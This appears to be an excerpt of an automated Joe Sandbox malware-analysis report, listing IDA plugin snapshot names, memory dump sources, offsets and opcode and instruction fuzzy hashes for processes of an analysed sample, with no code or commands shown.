                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17d1000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef0f32fa2421362309016a676eaa6d080a5d1d1af4e4591e123acd9727fc7836
                                                      • Instruction ID: 99dd2cc7998a978052c735ca2d816d1ab621f3c238d548e8c7c3393ce888eaab
                                                      • Opcode Fuzzy Hash: ef0f32fa2421362309016a676eaa6d080a5d1d1af4e4591e123acd9727fc7836
                                                      • Instruction Fuzzy Hash: 19E0123154A7884FC70A9B648C799803FB0EE6B25178B01D7C045CF5B3EA199D89C752
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17D1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17d1000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17D1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17d1000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17b0000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17a0000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                      • Instruction ID: 2e734663af7daf518e5d0c35484c56773a0b7bd95f5f53afd6ddd64d762e641b
                                                      • Opcode Fuzzy Hash: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                      • Instruction Fuzzy Hash: B9D0A73016954E4FDA04B73CC8498547BA0EB0F224FE510F1D009C7962C50948658700
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17D1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17d1000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17D1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17d1000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d3329cef210c5917aaa66904548dd6403d0e19a405802fb8b9875209739743e7
                                                      • Instruction ID: 19a41c95c353981898f307afb596021248a5fad258b09fda86d70d511a723343
                                                      • Opcode Fuzzy Hash: d3329cef210c5917aaa66904548dd6403d0e19a405802fb8b9875209739743e7
                                                      • Instruction Fuzzy Hash: D5D01234B909084F870CBA398859C747391EB6E2167D540B9D00AC73B2D96ADC89C741
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17D1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17d1000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a9cee11fd5e56917642f5aecf9bcba8472b5971c088329ff0cb5ef7e548d7890
                                                      • Instruction ID: d17ce154db8d3e5d39a3da65cb9804d06861323df27d7e66ebca49130797dc11
                                                      • Opcode Fuzzy Hash: a9cee11fd5e56917642f5aecf9bcba8472b5971c088329ff0cb5ef7e548d7890
                                                      • Instruction Fuzzy Hash: 15D01234B909044F870CBA39C8598747391EB6E3167D540BDD00AC72B6D96ADC89C781
                                                      Memory Dump Source
                                                      • Source File: 00000029.00000002.1503337738.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_41_2_7ff7c17b0000_llflCdrMcgGB.jbxd
                                                      Similarity
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24c66dfa6cefaf0e335ab2b27bdbf6c1ef60552e2540ce07d5552aaa431f17dc
                                                      • Instruction ID: cf57ad1ef99532360636243b2db127289db277989e34179afd4659901fe3b068
                                                      • Opcode Fuzzy Hash: 24c66dfa6cefaf0e335ab2b27bdbf6c1ef60552e2540ce07d5552aaa431f17dc
                                                      • Instruction Fuzzy Hash: C991A1B0E18A898FE755EBAC88597A97FE1FFA9314F4001BEC00AD7792CB785411C741
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d49867a30479c50f79946d15ba11b3345fc86f3582e73c4fae7224a3762d29da
                                                      • Instruction ID: 580b5412f5a6035e181c7081b52754debe860871afd7dba08c566b2587b66cca
                                                      • Opcode Fuzzy Hash: d49867a30479c50f79946d15ba11b3345fc86f3582e73c4fae7224a3762d29da
                                                      • Instruction Fuzzy Hash: 5B21D83130CC184FD768EE1CE889DB973D1EF5932171501BAE58AC7266DD51EC8287C1
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9231cd0d30b2321c2a44353c6fcf8cd0e00f094309b2ea1cacc82dad5498e4ab
                                                      • Instruction ID: a9649938d6478c3ae5787d438fe7bd2eeb43129f27d75009fd977271525c62d9
                                                      • Opcode Fuzzy Hash: 9231cd0d30b2321c2a44353c6fcf8cd0e00f094309b2ea1cacc82dad5498e4ab
                                                      • Instruction Fuzzy Hash: 31312612E0C95A6BE315B77C648E3F8A785EF54364F54457BD40DC72B7DE28B8818288
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 12c1f42d0c7d2c521106fb62ebb6f03ddef9d4e364a503742f0d1a68f6ec7851
                                                      • Instruction ID: b5ed48f4d022ad9148dc8f2f80efb5a006eaef9ed84ec717887a38e5309ed7bd
                                                      • Opcode Fuzzy Hash: 12c1f42d0c7d2c521106fb62ebb6f03ddef9d4e364a503742f0d1a68f6ec7851
                                                      • Instruction Fuzzy Hash: 7A21C520B289590FE798F72D5459675B6C2EF9C325B4000B9E80EC3397DE58EC414295
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96aee87f6c07567533f7ae982d27f392f973c8478566d47153a06977cfbf797e
                                                      • Instruction ID: 162e913279fbc36238292e23029439dcb62c6bf87bcc7d09a2bed3d6940dec7e
                                                      • Opcode Fuzzy Hash: 96aee87f6c07567533f7ae982d27f392f973c8478566d47153a06977cfbf797e
                                                      • Instruction Fuzzy Hash: 7D21F071A0C3898FE302EF69C8082EDBFB0EF56324F5485B6C4459B193DB78A545CBA5
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4865d83ac15d023243749916c2d68cb14afa4e439f54bb3c3e26b78e663b927e
                                                      • Instruction ID: f05173da62c9e7b20832ad1da95ab3624fe87e6af2db5090aef57faac086b3ec
                                                      • Opcode Fuzzy Hash: 4865d83ac15d023243749916c2d68cb14afa4e439f54bb3c3e26b78e663b927e
                                                      • Instruction Fuzzy Hash: AA118632E1D9198EEB64FE1994496FCA292EF6C331F9011B6D80DD31D7DFA878418760
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7aa8cadbddb7b172ff78e90f89724f1160155fb31785e1485b90f3f62ab09057
                                                      • Instruction ID: 24efe8c3bba6eb83c64c1ea4b09a15639080e31692fe1455d35dba18638ccbae
                                                      • Opcode Fuzzy Hash: 7aa8cadbddb7b172ff78e90f89724f1160155fb31785e1485b90f3f62ab09057
                                                      • Instruction Fuzzy Hash: 4E113030A0840A8FEB54FF19C448BB8A3A2EF68321F9041B5D80DC3193DFA8E8418B50
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1fc7bd0b0b7cee992631e0dd51935939272330108adeda92113a8f6078c8c8fa
                                                      • Instruction ID: 2112a6e2924352743d660bf912c06a091d4182f732d4b25384dd22b2b92e1ea1
                                                      • Opcode Fuzzy Hash: 1fc7bd0b0b7cee992631e0dd51935939272330108adeda92113a8f6078c8c8fa
                                                      • Instruction Fuzzy Hash: B811AC35A0C7888FE702EB68C8492EDBFB0EF56220F1545B6C484DB293E774A6098795
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62409c0cb7af9f0564ccd3fff60a0df169c9fc446e326965fe7a132f040725d1
                                                      • Instruction ID: 5a170dd74c5eb33ca7bc039c6d5ae601f4f0c06c33bfda615657bd5ecfef9fb7
                                                      • Opcode Fuzzy Hash: 62409c0cb7af9f0564ccd3fff60a0df169c9fc446e326965fe7a132f040725d1
                                                      • Instruction Fuzzy Hash: BE018B35A087888FE702EB68C8482D9BFB0AF56220F1545B6C481DB293D774A648CB90
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5129080648f6040b37c522720f4214fff51a8962782b14c5a6c77f5f1f69eb2f
                                                      • Instruction ID: 74f0fc53e17fac451fce7497f4db6b67ab93905999bfd492128ecfed4309466f
                                                      • Opcode Fuzzy Hash: 5129080648f6040b37c522720f4214fff51a8962782b14c5a6c77f5f1f69eb2f
                                                      • Instruction Fuzzy Hash: 4E015E7590D3889FD702EF74C84429DBFB0AF46314F1545EAD441DB2A3D774A644C791
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c900d0101946b5bc2a99759e6439f3a1be84d348402a1cda32fff17a24705fb
                                                      • Instruction ID: 79f37841a57729f3a6fd9d780a9fa35d76bc240b8b7bdd5a99accd7e8cece108
                                                      • Opcode Fuzzy Hash: 6c900d0101946b5bc2a99759e6439f3a1be84d348402a1cda32fff17a24705fb
                                                      • Instruction Fuzzy Hash: 2E018B7490D3889FE702EB74C84829DBFB0AF06314F1445EAC881DB293EB78AA44C791
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c0b67d8018478311337d0be313e8e759ba3daf077f094f559c4b14e2bffb0724
                                                      • Instruction ID: 63cb72b5d72f95fcd6b33bd21d44c3b88c398a17f8a17fe3237dfd12d391a000
                                                      • Opcode Fuzzy Hash: c0b67d8018478311337d0be313e8e759ba3daf077f094f559c4b14e2bffb0724
                                                      • Instruction Fuzzy Hash: 76F0E631D5940A8EEB64FE15C855BF8B262EF68321F5401B9D80DD3193DFBDA9418B60
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1d35f1724f1adc6db49046a45d6106ecbbea99bb5a5f4fe40b332a5eb99e0b2
                                                      • Instruction ID: 6ccc3ec26827ac6c14fc651122a9e23cb60afb111bf236cb72fcf0db51f44fa4
                                                      • Opcode Fuzzy Hash: f1d35f1724f1adc6db49046a45d6106ecbbea99bb5a5f4fe40b332a5eb99e0b2
                                                      • Instruction Fuzzy Hash: 08F03031E1C4098AEB10FE05C488AB8A362AF6D360FA041B5CC0DD31E3DFADB9418760
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f7ab15e07f9f44bd1b39b12e138568b7c5039ab6e02509fa8ce3889be5409fc
                                                      • Instruction ID: f67514a5bf3078ac64590bf619b32f74970855419607907847de711d07f64883
                                                      • Opcode Fuzzy Hash: 8f7ab15e07f9f44bd1b39b12e138568b7c5039ab6e02509fa8ce3889be5409fc
                                                      • Instruction Fuzzy Hash: FFF03030E0911A4FF754FA15C4147BAA3A09FA9324F940075DD4D972D3DF68ED418715
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                      • Instruction ID: 75713696015be674c8e10e2bf7436ff1cb40d7bce367fe93f64a1fa4eeb01bd2
                                                      • Opcode Fuzzy Hash: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                      • Instruction Fuzzy Hash: DCD0A73012954E4FDA00F73CC8498547BA0EB1F224FE510F1D00AC7962C60948658700
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 38bafcb96ffc316238749f9f8e05cf376279ef606639981b862e7a8e05f1742f
                                                      • Instruction ID: 44f625bf2688dc5396b9222e4dc1c57e9e7a88db57fd064f4eb6d35829fad523
                                                      • Opcode Fuzzy Hash: 38bafcb96ffc316238749f9f8e05cf376279ef606639981b862e7a8e05f1742f
                                                      • Instruction Fuzzy Hash: DEC08C00D0B60B00A650BA2F180A0ACE1205FEC338FF00032CC0C40083AECE60C6017E
                                                      Memory Dump Source
                                                      • Source File: 0000002A.00000002.1498314551.00007FF7C17B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_42_2_7ff7c17b0000_StartMenuExperienceHost.jbxd
                                                      Memory Dump Source
                                                      • Source File: 0000002B.00000002.1494474083.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_43_2_7ff7c17a0000_StartMenuExperienceHost.jbxd
                                                      • Instruction ID: 89a6ea73915a2e92c588b193378182b31302ee03364fe5367e29ec6fb6d77011
                                                      • Opcode Fuzzy Hash: c2f9a43a3e202649a4026ef8806b21b406c16f3f06bca05c6ccecb1836bb0331
                                                      • Instruction Fuzzy Hash: 3BB00204C5644F01A55476BB1946065F4906B4D324FD52570E44D51187A8CD65991267
                                                      Memory Dump Source
                                                      • Source File: 0000002B.00000002.1494474083.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_43_2_7ff7c17a0000_StartMenuExperienceHost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4240f07aa1fa7878a1268ac9f6d40dffa0b3b3bb61059715db6846cbbd43602e
                                                      • Instruction ID: d57871ce9e8817ff4ab4990268eefcde93509aab6d9b3c4de076c10d42a20a12
                                                      • Opcode Fuzzy Hash: 4240f07aa1fa7878a1268ac9f6d40dffa0b3b3bb61059715db6846cbbd43602e
                                                      • Instruction Fuzzy Hash: 76B00204C9751B01E61439B71D86569F4505B4D165FD521B0D81D4058798CD55A65173